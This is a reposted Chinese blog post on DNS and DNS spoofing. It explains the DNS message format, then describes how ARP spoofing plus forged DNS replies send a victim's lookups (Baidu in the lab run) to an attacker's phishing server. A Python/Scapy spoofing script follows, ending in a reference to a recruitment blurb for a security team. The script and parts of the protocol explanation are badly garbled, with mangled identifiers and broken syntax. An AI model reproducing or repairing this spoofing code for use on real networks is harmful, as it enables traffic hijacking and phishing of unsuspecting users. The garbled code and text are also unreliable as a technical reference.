dns python,修改dns违法吗

2022-11-18 10:23:25 分类:python 阅读()

  dns python,修改dns违法吗

  DNS

  DNS(域名系统)是互联网的一项服务。作为一个域名和IP地址相互映射的分布式数据库,访问互联网很方便。使用DNS TCP和UDP端口53。目前各级域名长度限制在63个字符以内,域名总长度不能超过253个字符。

  DNS协议

  DNS是一种域名解析协议,用于将域名转换为IP地址。

  DNS协议报文格式

  session IDentifier:DNS报文的id标识,其中该字段对于请求报文及其对应的响应报文是相同的,这样可以区分出DNS响应报文是哪个请求。

  徽标:

  QR (1位)查询/响应标志,0为查询,1为响应操作码)4位)0为标准查询,1为反向查询,2为服务器状态请求aa) 1位(批准回复TC) 1位)被截断rd) 1位问题,回答RRs,权限RRs,附加RRs分别表示最后4个区域的编号。问题表示查询问题区域部分的数量,答案表示答案区域的数量,权威名称用户表示批准区域的数量,附加记录表示附加区域的数量。

  DNS欺骗原理

  如果伪装成域名服务器,或者修改dns响应包的分析结果,替换成攻击者的IP地址,就意味着指向攻击者的IP地址。通过将钓鱼页面放入apache或nignx进行部署,可以修改指向钓鱼服务器的IP和端口进行钓鱼。

  DNS欺骗实现

  首先,欺骗将构造好的ARP回复数据包发送到目标设备。当ARP欺骗成功后,会监听端口53的dns报文,过滤目标ip地址的dns报文,得到请求报文,并修改源端口和目标端口的一些参数生成响应报文,修改anwser报文中的分析结果,转换成攻击目标地址发送给受害者。

  代码实现

  #!/usr/zydlc/env python #-coding:utf-8-* # @ file:DNS _ attack . py # @ author:feng # @ date 33602000 DNS packet=IP(/UDP)/DNS)ID,qr,opcode,rd,Qd=dnsqr)qnnammar verbose=false)ID表示匹配请求和响应qr 0表示查询消息opcode 0,标准查询rd 1表示递归defDNS_spoof(data) :try:#表示IP _ fields=data.getlayerUDP _ fields=data . get layer(UDP)fields # DNS _ fields=data . get layer。qd.qnameprint(str(req_domain))。split()[1])print(str)data)[IP]。split))(数据)652打印。src)=(192 . 168 . 31 . 135)3360(if src))192 . 168 . 168 3360 printing(str(req _ domain)del)data[IP]。len)(Dell))data)IP)652 RES . fc field=2 RES . dst=data . dst,data.src res[IP]。src,RES [ data data.sport RES [ DNS ]。QR=1RES [ DNS ]。ra=1RES [ DNS ]。an count=1RES [ DNS ]。an=DNS RR(RR name=req _ DOD)sendp(RES)Else:print(except例外:print(e)def DNS _ s))652 filtered DNS packet=IP(/UDP)/DNS)id,qr,opcode,rd,qd=DNSQR) qnname=DNS_name),verbose=false。

  Iface参数:指的是您的无线网卡的名称。目标设备是192.168.31.135,本地设备是192.168.31.225,网关是192.168.31.1,分析结果是220.220。

  然后进行dns欺诈攻击。

  匹配百度的结果被打印出来,wireshark也捕获icmp ping数据包。arp攻击不再响应攻击者的流量,后期形成向目标主机转发流量包的循环。

  攻击结果显示后,百度解析为设定结果。

  ERRORS Team ERRORS Team由网络安全爱好者联合成立,致力于从网络安全的各个方面维护国家网络安全。团队成员具备专业的渗透测试技术、安全评估能力、逆向分析技术和丰富的专业技能。这个团队是一个年轻而充满活力的团队,旨在通过知识分享和技术探讨,提高网络安全意识和专业知识。

  加入我们:

  错误团队主页:https://www.sentrylab.cn/

  团队申请:3359 www . vul box.com/team/errors

  或通过邮件联系:chihou.pro@gmail.com。

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

标签: python

相关文章阅读

  • python命令函数 python函数教学
  • python简单函数编程 如何用python编写函数
  • python随机函数种子 python随机数种子怎么用
  • python画兔子代码,python语言绘制小兔子源代码怎么运行
  • range函数是从0开始吗,python中range(0)
  • python多线程坑,python多线程阻塞
  • python怎么画k线,python绘制k线及均线
  • python调用安卓so库,python .so文件
  • python赋值运算符-=的作用是,在Python中关系运算符中,表示“不等于”
  • python语言是一种脚本编程语言,python属于脚本语言还是编程语言
  • python想获取字符串str的长度,python str转char
  • python从键盘不断输入整数,python控制键盘输入数字
  • python输入姓名输出姓,python输入名字输出你好代码
  • python怎么实现黑客攻击,python网络攻防
  • python@property,python中的property函数
    • 留言与评论(共有 条评论)
       
    验证码: